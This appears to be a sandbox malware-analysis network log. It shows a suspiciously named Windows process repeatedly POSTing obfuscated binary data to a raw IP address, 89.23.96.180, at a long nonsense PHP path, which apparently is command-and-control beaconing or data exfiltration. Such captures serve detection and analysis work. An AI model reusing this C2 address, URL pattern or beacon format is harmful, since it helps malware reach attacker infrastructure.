Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49918	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:31.806632042 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:32.200653076 CET	2536	OUT	Data Raw: 58 5f 43 5e 58 5d 57 52 55 5e 55 5a 54 5f 50 54 57 53 5c 5a 52 5f 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X_C^X]WRU^UZT_PTWS\ZR_QVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:/&=U![9,3$?-("/=%T5(4Z?<)5!_.#Q,6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49919	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:32.808115959 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:33.156048059 CET	2112	OUT	Data Raw: 58 54 43 51 58 5b 57 53 55 5e 55 5a 54 5c 50 55 57 52 5c 5c 52 52 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XTCQX[WSU^UZT\PUWR\\RRQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-<&!=W5Z-+%?R9+%#=X%5<<((=!_.#Q,
Dec 21, 2024 10:03:34.186583996 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:34.420625925 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 3a 0c 37 15 29 57 3f 3a 02 00 2a 59 31 08 3e 2e 04 1b 2c 0b 37 5d 22 05 3e 10 2a 5b 34 00 30 00 34 02 22 29 36 04 35 06 28 06 3e 0b 2e 58 01 1e 21 0b 37 1d 2d 1e 33 11 02 0d 2a 24 2e 5d 2b 00 26 13 24 2f 09 19 26 3a 34 1b 3f 03 3b 0e 31 13 0c 12 38 01 2f 5e 3c 07 2c 55 24 1c 2b 51 03 1e 26 10 26 3c 05 57 26 20 29 12 25 2e 0f 5d 23 3d 34 0e 2a 06 01 51 20 3b 3a 5f 38 2a 3f 06 3c 03 2a 59 29 06 00 13 24 02 2c 08 32 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:7)W?:Y1>.,7]">[404")65(>.X!7-3$.]+&$/&:4?;18/^<,U$+Q&&<W& )%.]#=4Q ;:_8?<Y)$,2>#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49920	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:32.928050041 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:33.281277895 CET	2536	OUT	Data Raw: 5d 54 46 54 5d 57 57 50 55 5e 55 5a 54 52 50 52 57 5c 5c 58 52 54 51 58 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]TFT]WWPU^UZTRPRW\\XRTQXZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C-"8T&%T=W&-Y?0,,.(-Q <&%?$$<>!_.#Q,
Dec 21, 2024 10:03:34.305059910 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:34.540568113 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49926	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:34.796835899 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:03:35.156455040 CET	2536	OUT	Data Raw: 58 53 46 53 58 5b 52 55 55 5e 55 5a 54 59 50 57 57 5e 5c 5d 52 51 51 5a 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XSFSX[RUU^UZTYPWW^\]RQQZZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ 9%>%W5]-?(]0?(T-(&#"%P?7 ?.'>5!_.#Q,.
Dec 21, 2024 10:03:36.163799047 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:36.396311045 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49932	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:36.638793945 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:36.987864017 CET	2536	OUT	Data Raw: 58 51 43 53 5d 5c 52 57 55 5e 55 5a 54 5f 50 53 57 58 5c 55 52 51 51 5e 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XQCS]\RWU^UZT_PSWX\URQQ^ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#9" 2=":9?+0, T->7<!&1!(4$+4_)!_.#Q,6
Dec 21, 2024 10:03:38.014162064 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:38.248359919 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49938	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:38.496766090 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:38.843765974 CET	2536	OUT	Data Raw: 5d 56 43 53 58 5d 57 5e 55 5e 55 5a 54 5a 50 56 57 52 5c 5d 52 5f 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]VCSX]W^U^UZTZPVWR\]R_QYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C.1,V&5Q=1-9??$Y<.45X%)+]+#=!_.#Q,"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49939	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:39.542537928 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:39.890510082 CET	2112	OUT	Data Raw: 58 52 46 53 5d 5b 57 54 55 5e 55 5a 54 53 50 54 57 52 5c 5b 52 52 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XRFS][WTU^UZTSPTWR\[RRQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C,2#%=>"-?<^'/(V:^)"<=&*48?')5!_.#Q,
Dec 21, 2024 10:03:40.919259071 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:41.156363964 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 55 21 3b 2d 54 28 14 2f 5f 2a 59 3a 50 29 3d 3a 59 2e 31 37 5f 36 3f 25 06 2a 04 23 58 27 10 2c 01 23 29 29 11 20 3c 2b 1d 2a 31 2e 58 01 1e 22 1b 20 20 3d 52 30 3f 3c 0e 3e 19 0c 5c 28 3d 39 01 24 2f 2b 14 31 2a 33 04 2b 03 38 1e 31 03 21 05 2c 01 23 12 2b 3e 30 57 26 26 2b 51 03 1e 26 5d 32 3c 3f 1f 32 0d 14 00 24 3e 3d 58 23 58 24 0e 3e 5e 33 53 20 15 3d 02 3b 00 24 16 28 04 3a 5d 2a 2b 21 00 30 3c 2f 54 25 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989U!;-T(/_Y:P)=:Y.17_6?%#X',#)) <+1.X" =R0?<>\(=9$/+13+81!,#+>0W&&+Q&]2<?2$>=X#X$>^3S =;$(:]*+!0</T%>#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49940	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:39.662297010 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:40.015459061 CET	2536	OUT	Data Raw: 58 52 46 54 5d 59 57 55 55 5e 55 5a 54 53 50 50 57 5f 5c 55 52 52 51 5f 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XRFT]YWUU^UZTSPPW_\URRQ_ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ .8V2=>9+3 :V /&2P$>-Z=5!_.#Q,
Dec 21, 2024 10:03:41.040293932 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:41.272377968 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49946	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:41.508147001 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2520 Expect: 100-continue
Dec 21, 2024 10:03:41.859224081 CET	2520	OUT	Data Raw: 58 52 46 50 5d 59 52 54 55 5e 55 5a 54 5b 50 55 57 5a 5c 5a 52 57 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XRFP]YRTU^UZT[PUWZ\ZRWQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ @,13&[%*"%-?Y0/+-S7?>'".T<3]?[(=!_.#Q,>
Dec 21, 2024 10:03:42.885377884 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:43.120584011 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49952	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:43.367108107 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:43.718601942 CET	2536	OUT	Data Raw: 5d 51 43 5e 5d 58 57 56 55 5e 55 5a 54 5f 50 5c 57 5f 5c 5c 52 55 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]QC^]XWVU^UZT_P\W_\\RUQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#.U2>=U)*,/?'/;:8"7>12!(4?=$X)%!_.#Q,6
Dec 21, 2024 10:03:44.746711969 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:44.980382919 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49958	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:45.229773998 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:45.578068972 CET	2536	OUT	Data Raw: 58 53 43 54 5d 5d 57 50 55 5e 55 5a 54 5a 50 56 57 53 5c 5c 52 50 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XSCT]]WPU^UZTZPVWS\\RPQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:1T%!..0%/.8-P#)1T5< <,[%!_.#Q,"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49959	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:46.293195009 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:46.640572071 CET	2112	OUT	Data Raw: 58 50 43 52 5d 57 52 50 55 5e 55 5a 54 53 50 5d 57 5a 5c 59 52 56 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XPCR]WRPU^UZTSP]WZ\YRVQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ C.(T&)T*&9?Y3< S:^&49Y'!6P<$#?> Y)!_.#Q,
Dec 21, 2024 10:03:47.672502995 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:47.908140898 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 1e 21 38 35 52 3f 5c 3c 07 2a 06 29 0d 3e 2e 3e 59 2f 31 2f 5f 23 2c 03 00 3d 04 23 1d 24 3e 33 11 35 03 3a 00 20 2f 2f 13 3d 0b 2e 58 01 1e 22 1b 23 33 21 53 27 3c 33 1e 3e 51 25 06 2b 2e 2a 1e 27 2c 27 53 25 04 38 16 3c 3a 33 08 25 13 26 59 2f 11 01 59 28 10 37 0d 27 36 2b 51 03 1e 26 1f 24 3f 3f 52 31 0d 31 5b 26 07 21 14 37 2e 3b 11 3e 28 37 53 23 3b 2e 5d 38 2a 38 58 28 03 2d 04 3d 01 3a 58 24 12 0d 18 26 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989!85R?\<)>.>Y/1/_#,=#$>35: //=.X"#3!S'<3>Q%+.','S%8<:3%&Y/Y(7'6+Q&$??R11[&!7.;>(7S#;.]8*8X(-=:X$&#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49960	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:46.428020954 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:03:46.781085968 CET	2536	OUT	Data Raw: 58 5e 46 57 5d 5c 52 57 55 5e 55 5a 54 5f 50 51 57 58 5c 5c 52 52 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X^FW]\RWU^UZT_PQWX\\RRQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#," &&=_:Y8%?<U.;>7?%X215+^(>8Z)5!_.#Q,6
Dec 21, 2024 10:03:47.806485891 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:03:48.044274092 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:03:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49966	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:03:48.294677019 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
